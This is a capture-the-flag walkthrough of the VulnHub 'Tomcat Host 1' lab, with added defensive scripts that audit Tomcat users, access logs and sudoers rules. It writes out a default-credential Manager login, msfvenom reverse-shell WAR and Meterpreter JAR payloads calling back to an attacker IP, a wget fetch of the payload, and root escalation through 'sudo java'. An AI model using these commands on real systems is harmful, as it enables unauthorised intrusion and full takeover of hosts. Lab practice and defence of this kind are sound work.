Tomcat Host

Welcome to “My Tomcat Host”. This boot to root VM is designed for testing your basic enumeration skills and concepts.

URL: Tomcat Host 1 (VulnHub)

Difficulty: Easy/Beginner Level

Author: Akanksha Sachin Verma

Enumeration

First, a netdiscover scan reveals the machine’s IP address on the network:

netdiscover -i eth1

Then an nmap scan:

nmap -p- -A 192.168.56.110

A closer look at port 8080 in my browser reveals Apache Tomcat/9.0.31.

Apache Tomcat is an application server designed to execute Java servlets and render web pages written with JavaServer Pages (JSP).

The “Manager App” section requires a username and password. The default credentials for Tomcat work (tomcat:tomcat).

192.168.56.110:8080/manager/html
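
The weak setting that makes this step possible is a Manager user with well-known default credentials. The following audit script is an added example (not part of the original write-up): it parses a `tomcat-users.xml` and flags users that still carry default credentials or a deployment role. The two XML documents, the `DEFAULT_CREDS` list and the `MIN_PASSWORD_LEN` threshold are constructed assumptions for the demonstration.

```python
"""Audit tomcat-users.xml for default credentials and Manager deploy roles (added example)."""
import xml.etree.ElementTree as ET

# Assumed list of well-known username:password defaults worth flagging.
DEFAULT_CREDS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", "tomcat"), ("manager", "manager"), ("role1", "tomcat"),
}
# Roles that allow deploying arbitrary web applications, i.e. code execution on the host.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumed local password policy

# Constructed sample: the weak configuration seen on the VM (default tomcat:tomcat).
SAMPLE_WEAK = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="reader"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="reporter" password="x8!Lq" roles="reader"/>
</tomcat-users>
"""

# Constructed sample: a hardened configuration with a unique, long password and only
# the browser role (no manager-script, so no unattended deploy via the text interface).
SAMPLE_HARDENED = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="deployer" password="Vq7!pR2#mZ9$kL4wNb8x" roles="manager-gui"/>
</tomcat-users>
"""


def _local(tag):
    """Strip a namespace prefix such as {http://tomcat.apache.org/xml} from an element tag."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (severity, username, message) findings for one tomcat-users.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        is_default = (name, password) in DEFAULT_CREDS
        if is_default:
            findings.append(("HIGH", name, "well-known default credentials"))
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append(("MEDIUM", name, f"password shorter than {MIN_PASSWORD_LEN} characters"))
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy:
            severity = "HIGH" if is_default else "INFO"
            findings.append((severity, name, "can deploy web applications via roles: " + ", ".join(deploy)))
    return findings


def high_findings(xml_text):
    """Only the findings that should block a deployment review."""
    return [f for f in audit_tomcat_users(xml_text) if f[0] == "HIGH"]


if __name__ == "__main__":
    for label, doc in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(f"== {label} ==")
        for severity, user, msg in audit_tomcat_users(doc):
            print(f"{severity:6} {user:10} {msg}")
```

Tomcat ships its example users commented out, so a working `tomcat:tomcat` login means someone enabled it deliberately; the audit treats that, and any deploy role bound to such an account, as a high finding, while a deploy role on a strong, unique account is only reported for inventory.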

The Web Application Manager allows WAR files to be deployed, which is an opportunity to upload a reverse shell. I’ll be using msfvenom to create the reverse shell. This is a good website on how to use msfvenom, for reference:

Offensive Security

The payload must be a WAR file that connects back to my local address on port 4444.

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f war > fedai.war

This will be uploaded here:

Before executing the payload, listen on port 4444 with netcat:

nc -nvlp 4444

Now it must be executed, so we visit the path where it was deployed, in my case /fedai. We now have a reverse shell; the uid is ‘tomcat’.

id
python -c 'import pty;pty.spawn("/bin/bash")'
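
From the defender’s side, every step above leaves a trace in Tomcat’s access log: the login attempts against /manager/html, the upload itself, and the first request to the freshly deployed context. The detector below is an added example, not part of the original write-up; it assumes the default AccessLogValve pattern (`%h %l %u %t "%r" %s %b`), a constructed set of log lines, an assumed baseline of known contexts in `KNOWN_CONTEXTS`, and an assumed failed-login threshold.

```python
"""Flag Manager-app deployments and their follow-up requests in a Tomcat access log (added example)."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Matches the default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Manager endpoints that create or remove a web application.
DEPLOY_ENDPOINTS = {"/manager/html/upload", "/manager/text/deploy", "/manager/text/undeploy"}
# Assumed baseline of contexts that are expected on this host.
KNOWN_CONTEXTS = {"", "ROOT", "manager", "host-manager", "docs", "examples"}
FAILED_LOGIN_THRESHOLD = 5  # assumed: alert once this many 401s come from one source

# Constructed sample log resembling the sequence in the write-up (not a real capture).
SAMPLE_LOG = """\
192.168.56.101 - - [03/May/2020:13:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.101 - tomcat [03/May/2020:13:01:09 +0000] "GET /manager/html HTTP/1.1" 200 20135
192.168.56.101 - tomcat [03/May/2020:13:02:31 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 19877
192.168.56.101 - - [03/May/2020:13:02:50 +0000] "GET /fedai/ HTTP/1.1" 200 0
192.168.56.120 - - [03/May/2020:13:03:00 +0000] "GET /docs/index.html HTTP/1.1" 200 12345
"""


def detect_manager_deployments(log_text):
    """Return (timestamp, source_ip, message) alerts for one access log."""
    alerts = []
    deploy_sources = set()   # IPs that completed a deploy/undeploy request
    failed_logins = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than fail the whole scan
        path = urlsplit(m["target"]).path
        status = int(m["status"])
        ip = m["ip"]

        if path.startswith("/manager/") and status == 401:
            failed_logins[ip] += 1
            if failed_logins[ip] == FAILED_LOGIN_THRESHOLD:
                alerts.append((m["ts"], ip, f"{FAILED_LOGIN_THRESHOLD} failed Manager logins"))
            continue

        if path in DEPLOY_ENDPOINTS:
            if 200 <= status < 400:
                alerts.append((m["ts"], ip, f"successful {path} by user {m['user']}"))
                deploy_sources.add(ip)
            continue

        # First path segment is the web application context, e.g. /fedai/ -> "fedai".
        context = path.split("/", 2)[1] if path.startswith("/") else ""
        if ip in deploy_sources and context not in KNOWN_CONTEXTS:
            alerts.append((m["ts"], ip, f"request to previously unseen context /{context} after a deployment"))
    return alerts


if __name__ == "__main__":
    for ts, ip, msg in detect_manager_deployments(SAMPLE_LOG):
        print(f"[{ts}] {ip}: {msg}")
```

The second alert is the useful one for triage: a request to a context that did not exist before, from the same source that just uploaded something, is the moment the uploaded code starts running. Pair it with an inventory of the webapps directory so that legitimate releases are added to the baseline.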

User

Always check sudo privileges to see how we can start escalating privileges:

sudo -l

As shown, the user tomcat can run this command with sudo: /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java. This is an OpenJDK java binary, which we can use to escalate privileges.
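
A sudo rule that lets an unprivileged service account run a JVM as root is the root cause of this escalation, and it is the kind of rule a sudoers review should catch before an attacker does. The script below is an added example, not part of the original write-up: it parses a simplified sudoers file and reports rules whose command is `ALL` or an interpreter/runtime that can launch arbitrary programs. The sudoers text, the `NOPASSWD` tag on the tomcat rule and the `ARBITRARY_EXEC` list are constructed assumptions; the java path is the one reported by `sudo -l` on the VM.

```python
"""Report sudoers rules that hand out arbitrary code execution (added example)."""
import os
import re

# user  host=(runas)  [TAG:] command[, command ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:(?:NO)?PASSWD|(?:NO)?SETENV|(?:NO)?EXEC|(?:NO)?LOG_INPUT|(?:NO)?LOG_OUTPUT|(?:NO)?MAIL|(?:NO)?FOLLOW):\s*")
# Assumed list of runtimes that execute whatever code they are pointed at.
ARBITRARY_EXEC = {"java", "python", "python2", "python3", "perl", "ruby", "node", "php", "sh", "bash", "zsh"}

# Constructed sample resembling the rule found on the VM (NOPASSWD is assumed).
SAMPLE_SUDOERS = """\
Defaults    env_reset
root    ALL=(ALL)       ALL
%wheel  ALL=(ALL)       ALL
tomcat  ALL=(ALL) NOPASSWD: /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
backup  ALL=(root) /usr/bin/rsync --server --sender -logDtpre.iLsfx . /var/backups
"""


def parse_sudoers(text):
    """Return one dict per command specification: user, runas, nopasswd, command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (and #include directives)
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            nopasswd = False
            while True:  # peel off leading tags such as NOPASSWD: or SETENV:
                tag = TAG_RE.match(spec)
                if not tag:
                    break
                if spec.startswith("NOPASSWD:"):
                    nopasswd = True
                spec = spec[tag.end():]
            command = spec.split()[0] if spec else ""
            rules.append({"user": m["user"], "runas": m["runas"] or "root",
                          "nopasswd": nopasswd, "command": command})
    return rules


def risky_rules(text):
    """Return (user, command, reason) for rules that amount to running anything as the runas user."""
    out = []
    for rule in parse_sudoers(text):
        base = os.path.basename(rule["command"])
        if rule["command"] == "ALL":
            reason = f"unrestricted ALL as {rule['runas']}"
        elif base in ARBITRARY_EXEC:
            reason = f"{base} can launch arbitrary programs as {rule['runas']}"
        else:
            continue
        if rule["nopasswd"]:
            reason += ", without a password"
        out.append((rule["user"], rule["command"], reason))
    return out


if __name__ == "__main__":
    for user, command, reason in risky_rules(SAMPLE_SUDOERS):
        print(f"{user:8} {reason}\n         {command}")
```

Expect the root and %wheel entries to show up as well; the finding that matters is the service account. Tomcat does not need sudo at all to serve applications, so the fix is to delete the rule rather than to restrict its arguments, since a JVM will always accept a path to code it should run.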

We’ll create another reverse shell payload, this time a Meterpreter payload in JAR format, connecting back to my local IP address on port 5555. The file will be downloaded to the victim’s machine, so it is created under the Apache web directory on my machine.

msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp lhost=192.168.56.101 lport=5555 > fedai.jar

Start the apache2 service:

service apache2 start

On the victim’s machine, change to the temp directory and transfer the payload over:

cd /tmp
wget http://192.168.56.101/fedai.jar

Root

Before executing it, we need to set up the Meterpreter handler in Metasploit:

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.56.101
set lport 5555
run

Let’s execute this payload with the following command:

sudo java -jar fedai.jar

We get a successful connection from the Tomcat machine, as seen in Meterpreter, and the current user is identified as root!

Written on May 3, 2020